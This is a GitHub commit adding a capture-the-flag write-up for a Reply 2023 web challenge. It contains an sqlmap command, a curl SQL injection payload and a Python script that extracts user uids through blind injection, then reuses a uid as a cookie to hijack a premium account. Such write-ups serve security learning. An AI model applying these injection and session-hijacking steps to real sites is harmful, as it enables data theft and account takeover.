Skip to content

Commit

Permalink
Add reply-23 - The_Last_Fighting_Goat writeup
Browse files Browse the repository at this point in the history
  • Loading branch information
aenniw committed Nov 23, 2023
1 parent dfea681 commit 1cebb8d
Showing 1 changed file with 61 additions and 1 deletion.
62 changes: 61 additions & 1 deletion challenges.reply.com-23/The_Last_Fighting_Goat/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,10 +8,70 @@ The palace of the Web Realm, a gleaming place called Hypercloud, is guarded by P

#### Solution:

- poking around the application revealed that one page have hidden form field
```html
<form hidden="true">
<input name="year">
</form>
```
- using it with `sqlmap -u "http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof" --data "year=*" --random-agent --level 5 --risk 3 --dbs` reveals that there is SQL injection
- after long time digging and trying out different stuff we found that there is in the same table also `uid` column that could be leaked/guessed for the `top` players with `curl -vX POST 'http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof' --data "year=' or (1=1 and year=2023 and name='humming_non-smoker2003' and uid like '2%')--"`

```python
import requests
import string

candidates = "abcdef" + string.digits + '-'

ses = requests.session()

r = ses.post(
"http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof",
data={"year": "' or 1=1 --"}
)

names = []

for line in r.text.splitlines():
if '<td class="prize">' in line:
names.append(
line.split(">")[1].split("<")[0]
)

```bash
uuid = ""

for name in names:
while len(uuid) < 36:
for c in candidates:
r = ses.post(
f'http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/hof',
data={"year": "' or (1=1 and name='" + name + "' and uid like '" + uuid + c + "%')--"})

listings = []
for line in r.text.splitlines():
if '<td class="prize">' in line:
listings.append(
line.split(">")[1].split("<")[0]
)

if len(listings) == 1 and name in r.text:
uuid = uuid + c
break

ses.cookies.set("UID", uuid, domain="gamebox1.reply.it")
r = ses.post(
"http://gamebox1.reply.it/web2-3c91477fb7fb643fc15d090da43cb634f20f0ed7/bets_history")

if "You need a premium account to use the feature" not in r.text:
print(name, uuid, "Premium")
break
else:
print(name, uuid)
uuid = ""
```

- now that we have `uid` of premium account we can just follow it's bid based on `bets_history` and earn the `prize`

---

<details><summary>FLAG:</summary>
Expand Down

0 comments on commit 1cebb8d

Please sign in to comment.